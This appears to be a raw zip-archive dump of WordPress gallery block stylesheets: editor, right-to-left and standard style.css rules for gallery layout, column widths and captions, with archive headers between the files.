.block-library-gallery-item__inline-menu .components-button.has-icon:not(:focus){ border:none; box-shadow:none; } @media (min-width:600px){ .columns-7 .block-library-gallery-item__inline-menu .components-button.has-icon,.columns-8 .block-library-gallery-item__inline-menu .components-button.has-icon{ height:inherit; padding:0; width:inherit; } } .block-library-gallery-item__inline-menu.is-left{ right:-2px; } .block-library-gallery-item__inline-menu.is-right{ left:-2px; } .wp-block-gallery ul.blocks-gallery-grid{ margin:0; padding:0; } @media (min-width:600px){ .wp-block-update-gallery-modal{ max-width:480px; } } .wp-block-update-gallery-modal-buttons{ display:flex; gap:12px; justify-content:flex-end; }PK6[#g gallery/editor-rtl.min.cssnu[figure.wp-block-gallery{display:block}figure.wp-block-gallery>.blocks-gallery-caption{flex:0 0 100%}figure.wp-block-gallery>.blocks-gallery-media-placeholder-wrapper{flex-basis:100%}figure.wp-block-gallery .wp-block-image .components-notice.is-error{display:block}figure.wp-block-gallery .wp-block-image .components-notice__content{margin:4px 0}figure.wp-block-gallery .wp-block-image .components-notice__dismiss{left:5px;position:absolute;top:0}figure.wp-block-gallery .block-editor-media-placeholder.is-appender .components-placeholder__label{display:none}figure.wp-block-gallery .block-editor-media-placeholder.is-appender .block-editor-media-placeholder__button{margin-bottom:0}figure.wp-block-gallery .block-editor-media-placeholder{margin:0}figure.wp-block-gallery .block-editor-media-placeholder .components-placeholder__label{display:flex}figure.wp-block-gallery .block-editor-media-placeholder figcaption{z-index:2}figure.wp-block-gallery .components-spinner{margin-right:-9px;margin-top:-9px;position:absolute;right:50%;top:50%}.gallery-settings-buttons .components-button:first-child{margin-left:8px}.gallery-image-sizes .components-base-control__label{display:block;margin-bottom:4px}.gallery-image-sizes .gallery-image-sizes__loading{align-items:center;color:#757575;display:flex;font-size:12px}.gallery-image-sizes .components-spinner{margin:0 4px 0 8px}.blocks-gallery-item figure:not(.is-selected):focus,.blocks-gallery-item img:focus{outline:none}.blocks-gallery-item figure.is-selected:before{bottom:0;box-shadow:0 0 0 1px #fff inset,0 0 0 3px var(--wp-admin-theme-color) inset;content:"";left:0;outline:2px solid transparent;pointer-events:none;position:absolute;right:0;top:0;z-index:1}.blocks-gallery-item figure.is-transient img{opacity:.3}.blocks-gallery-item .is-selected .block-library-gallery-item__inline-menu{display:inline-flex}.blocks-gallery-item .block-editor-media-placeholder{height:100%;margin:0}.blocks-gallery-item .block-editor-media-placeholder .components-placeholder__label{display:flex}.block-library-gallery-item__inline-menu{background:#fff;border:1px solid #1e1e1e;border-radius:2px;display:none;margin:8px;position:absolute;top:-2px;transition:box-shadow .2s ease-out;z-index:20}@media (prefers-reduced-motion:reduce){.block-library-gallery-item__inline-menu{transition-delay:0s;transition-duration:0s}}.block-library-gallery-item__inline-menu:hover{box-shadow:0 .7px 1px rgba(0,0,0,.1),0 1.2px 1.7px -.2px rgba(0,0,0,.1),0 2.3px 3.3px -.5px rgba(0,0,0,.1)}@media (min-width:600px){.columns-7 .block-library-gallery-item__inline-menu,.columns-8 .block-library-gallery-item__inline-menu{padding:2px}}.block-library-gallery-item__inline-menu .components-button.has-icon:not(:focus){border:none;box-shadow:none}@media (min-width:600px){.columns-7 .block-library-gallery-item__inline-menu .components-button.has-icon,.columns-8 .block-library-gallery-item__inline-menu .components-button.has-icon{height:inherit;padding:0;width:inherit}}.block-library-gallery-item__inline-menu.is-left{right:-2px}.block-library-gallery-item__inline-menu.is-right{left:-2px}.wp-block-gallery ul.blocks-gallery-grid{margin:0;padding:0}@media (min-width:600px){.wp-block-update-gallery-modal{max-width:480px}}.wp-block-update-gallery-modal-buttons{display:flex;gap:12px;justify-content:flex-end}PK6[x99gallery/style-rtl.cssnu[.blocks-gallery-grid:not(.has-nested-images),.wp-block-gallery:not(.has-nested-images){ display:flex; flex-wrap:wrap; list-style-type:none; margin:0; padding:0; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item{ display:flex; flex-direction:column; flex-grow:1; justify-content:center; margin:0 0 1em 1em; position:relative; width:calc(50% - 1em); } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n){ margin-left:0; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figure,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figure{ align-items:flex-end; display:flex; height:100%; justify-content:flex-start; margin:0; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item img{ display:block; height:auto; max-width:100%; width:auto; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption{ background:linear-gradient(0deg, rgba(0,0,0,.7), rgba(0,0,0,.3) 70%, transparent); bottom:0; box-sizing:border-box; color:#fff; font-size:.8em; margin:0; max-height:100%; overflow:auto; padding:3em .77em .7em; position:absolute; text-align:center; width:100%; z-index:2; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption img{ display:inline; } .blocks-gallery-grid:not(.has-nested-images) figcaption,.wp-block-gallery:not(.has-nested-images) figcaption{ flex-grow:1; } .blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item img{ flex:1; height:100%; object-fit:cover; width:100%; } .blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item{ margin-left:0; width:100%; } @media (min-width:600px){ .blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item{ margin-left:1em; width:calc(33.33333% - .66667em); } .blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item{ margin-left:1em; width:calc(25% - .75em); } .blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item{ margin-left:1em; width:calc(20% - .8em); } .blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item{ margin-left:1em; width:calc(16.66667% - .83333em); } .blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item{ margin-left:1em; width:calc(14.28571% - .85714em); } .blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item{ margin-left:1em; width:calc(12.5% - .875em); } .blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n){ margin-left:0; } } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:last-child,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:last-child{ margin-left:0; } .blocks-gallery-grid:not(.has-nested-images).alignleft,.blocks-gallery-grid:not(.has-nested-images).alignright,.wp-block-gallery:not(.has-nested-images).alignleft,.wp-block-gallery:not(.has-nested-images).alignright{ max-width:420px; width:100%; } .blocks-gallery-grid:not(.has-nested-images).aligncenter .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images).aligncenter .blocks-gallery-item figure{ justify-content:center; } .wp-block-gallery:not(.is-cropped) .blocks-gallery-item{ align-self:flex-start; } figure.wp-block-gallery.has-nested-images{ align-items:normal; } .wp-block-gallery.has-nested-images figure.wp-block-image:not(#individual-image){ margin:0; width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)/2); } .wp-block-gallery.has-nested-images figure.wp-block-image{ box-sizing:border-box; display:flex; flex-direction:column; flex-grow:1; justify-content:center; max-width:100%; position:relative; } .wp-block-gallery.has-nested-images figure.wp-block-image>a,.wp-block-gallery.has-nested-images figure.wp-block-image>div{ flex-direction:column; flex-grow:1; margin:0; } .wp-block-gallery.has-nested-images figure.wp-block-image img{ display:block; height:auto; max-width:100% !important; width:auto; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption{ background:linear-gradient(0deg, rgba(0,0,0,.7), rgba(0,0,0,.3) 70%, transparent); bottom:0; box-sizing:border-box; color:#fff; font-size:13px; margin-bottom:0; max-height:60%; overflow:auto; padding:0 8px 8px; position:absolute; right:0; text-align:center; width:100%; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption img{ display:inline; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption a{ color:inherit; } .wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border img{ box-sizing:border-box; } .wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>a,.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>div,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>a,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>div{ flex:1 1 auto; } .wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border figcaption,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded figcaption{ background:none; color:inherit; flex:initial; margin:0; padding:10px 10px 9px; position:relative; } .wp-block-gallery.has-nested-images figcaption{ flex-basis:100%; flex-grow:1; text-align:center; } .wp-block-gallery.has-nested-images:not(.is-cropped) figure.wp-block-image:not(#individual-image){ margin-bottom:auto; margin-top:0; } .wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image){ align-self:inherit; } .wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>div:not(.components-drop-zone){ display:flex; } .wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) img{ flex:1 0 0%; height:100%; object-fit:cover; width:100%; } .wp-block-gallery.has-nested-images.columns-1 figure.wp-block-image:not(#individual-image){ width:100%; } @media (min-width:600px){ .wp-block-gallery.has-nested-images.columns-3 figure.wp-block-image:not(#individual-image){ width:calc(33.33333% - var(--wp--style--unstable-gallery-gap, 16px)*.66667); } .wp-block-gallery.has-nested-images.columns-4 figure.wp-block-image:not(#individual-image){ width:calc(25% - var(--wp--style--unstable-gallery-gap, 16px)*.75); } .wp-block-gallery.has-nested-images.columns-5 figure.wp-block-image:not(#individual-image){ width:calc(20% - var(--wp--style--unstable-gallery-gap, 16px)*.8); } .wp-block-gallery.has-nested-images.columns-6 figure.wp-block-image:not(#individual-image){ width:calc(16.66667% - var(--wp--style--unstable-gallery-gap, 16px)*.83333); } .wp-block-gallery.has-nested-images.columns-7 figure.wp-block-image:not(#individual-image){ width:calc(14.28571% - var(--wp--style--unstable-gallery-gap, 16px)*.85714); } .wp-block-gallery.has-nested-images.columns-8 figure.wp-block-image:not(#individual-image){ width:calc(12.5% - var(--wp--style--unstable-gallery-gap, 16px)*.875); } .wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image){ width:calc(33.33% - var(--wp--style--unstable-gallery-gap, 16px)*.66667); } .wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2),.wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:nth-last-child(2)~figure.wp-block-image:not(#individual-image){ width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)*.5); } .wp-block-gallery.has-nested-images.columns-default figure.wp-block-image:not(#individual-image):first-child:last-child{ width:100%; } } .wp-block-gallery.has-nested-images.alignleft,.wp-block-gallery.has-nested-images.alignright{ max-width:420px; width:100%; } .wp-block-gallery.has-nested-images.aligncenter{ justify-content:center; }PK6[99gallery/style.cssnu[.blocks-gallery-grid:not(.has-nested-images),.wp-block-gallery:not(.has-nested-images){ display:flex; flex-wrap:wrap; list-style-type:none; margin:0; padding:0; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item{ display:flex; flex-direction:column; flex-grow:1; justify-content:center; margin:0 1em 1em 0; position:relative; width:calc(50% - 1em); } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n){ margin-right:0; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figure,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figure{ align-items:flex-end; display:flex; height:100%; justify-content:flex-start; margin:0; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item img{ display:block; height:auto; max-width:100%; width:auto; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption{ background:linear-gradient(0deg, rgba(0,0,0,.7), rgba(0,0,0,.3) 70%, transparent); bottom:0; box-sizing:border-box; color:#fff; font-size:.8em; margin:0; max-height:100%; overflow:auto; padding:3em .77em .7em; position:absolute; text-align:center; width:100%; z-index:2; } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption img{ display:inline; } .blocks-gallery-grid:not(.has-nested-images) figcaption,.wp-block-gallery:not(.has-nested-images) figcaption{ flex-grow:1; } .blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item img{ flex:1; height:100%; object-fit:cover; width:100%; } .blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item{ margin-right:0; width:100%; } @media (min-width:600px){ .blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item{ margin-right:1em; width:calc(33.33333% - .66667em); } .blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item{ margin-right:1em; width:calc(25% - .75em); } .blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item{ margin-right:1em; width:calc(20% - .8em); } .blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item{ margin-right:1em; width:calc(16.66667% - .83333em); } .blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item{ margin-right:1em; width:calc(14.28571% - .85714em); } .blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item{ margin-right:1em; width:calc(12.5% - .875em); } .blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.blocks-gallery-grid:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item:nth-of-type(1n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-2 .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-image:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-3 .blocks-gallery-item:nth-of-type(3n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-image:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-4 .blocks-gallery-item:nth-of-type(4n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-image:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-5 .blocks-gallery-item:nth-of-type(5n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-image:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-6 .blocks-gallery-item:nth-of-type(6n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-image:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-7 .blocks-gallery-item:nth-of-type(7n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-image:nth-of-type(8n),.wp-block-gallery:not(.has-nested-images).columns-8 .blocks-gallery-item:nth-of-type(8n){ margin-right:0; } } .blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:last-child,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:last-child,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:last-child{ margin-right:0; } .blocks-gallery-grid:not(.has-nested-images).alignleft,.blocks-gallery-grid:not(.has-nested-images).alignright,.wp-block-gallery:not(.has-nested-images).alignleft,.wp-block-gallery:not(.has-nested-images).alignright{ max-width:420px; width:100%; } .blocks-gallery-grid:not(.has-nested-images).aligncenter .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images).aligncenter .blocks-gallery-item figure{ justify-content:center; } .wp-block-gallery:not(.is-cropped) .blocks-gallery-item{ align-self:flex-start; } figure.wp-block-gallery.has-nested-images{ align-items:normal; } .wp-block-gallery.has-nested-images figure.wp-block-image:not(#individual-image){ margin:0; width:calc(50% - var(--wp--style--unstable-gallery-gap, 16px)/2); } .wp-block-gallery.has-nested-images figure.wp-block-image{ box-sizing:border-box; display:flex; flex-direction:column; flex-grow:1; justify-content:center; max-width:100%; position:relative; } .wp-block-gallery.has-nested-images figure.wp-block-image>a,.wp-block-gallery.has-nested-images figure.wp-block-image>div{ flex-direction:column; flex-grow:1; margin:0; } .wp-block-gallery.has-nested-images figure.wp-block-image img{ display:block; height:auto; max-width:100% !important; width:auto; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption{ background:linear-gradient(0deg, rgba(0,0,0,.7), rgba(0,0,0,.3) 70%, transparent); bottom:0; box-sizing:border-box; color:#fff; font-size:13px; left:0; margin-bottom:0; max-height:60%; overflow:auto; padding:0 8px 8px; position:absolute; text-align:center; width:100%; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption img{ display:inline; } .wp-block-gallery.has-nested-images figure.wp-block-image figcaption a{ color:inherit; } .wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border img{ box-sizing:border-box; } .wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>a,.wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border>div,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>a,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded>div{ flex:1 1 auto; } .wp-block-gallery.has-nested-images figure.wp-block-image.has-custom-border figcaption,.wp-block-gallery.has-nested-images figure.wp-block-image.is-style-rounded figcaption{ background:none; color:inherit; flex:initial; margin:0; padding:10px 10px 9px; position:relative; } .wp-block-gallery.has-nested-images figcaption{ flex-basis:100%; flex-grow:1; text-align:center; } .wp-block-gallery.has-nested-images:not(.is-cropped) figure.wp-block-image:not(#individual-image){ margin-bottom:auto; margin-top:0; } .wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image){ align-self:inherit; } .wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image)>div:not(.components-drop-zone){ display:flex; } .wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) a,.wp-block-gallery.has-nested-images.is-cropped figure.wp-block-image:not(#individual-image) img{ flex:1 0 0%; height:100%; object-fit:cover; width:100%; } .wp-block-gallery.has-nested-images.columns-1 figure.wp-block-image:not(#individual-image){ width:100%; } @media (min-width:600px){ .wp-block-gallery.has-nested-images.columns-3 figure.wp-block-image:not(#individual-image){ width:calc(33.33333% - var(--wp--style--unstable-gallery-gap, 16px)*.66667); } .wp-block-gallery.has-nested-images.columns-4 figure.wp-block-image:not(#individual-image){ width:calc(25% - var(--wp--style--unstable-gallery-gap, 16px)*.75); } .wp-block-gallery.has-nested-images.columns-5 figure.wp-block-image:not(#individual-image){ width:calc(20% - var(--wp--style--unstable-gallery-gap, 16px)*.8); } 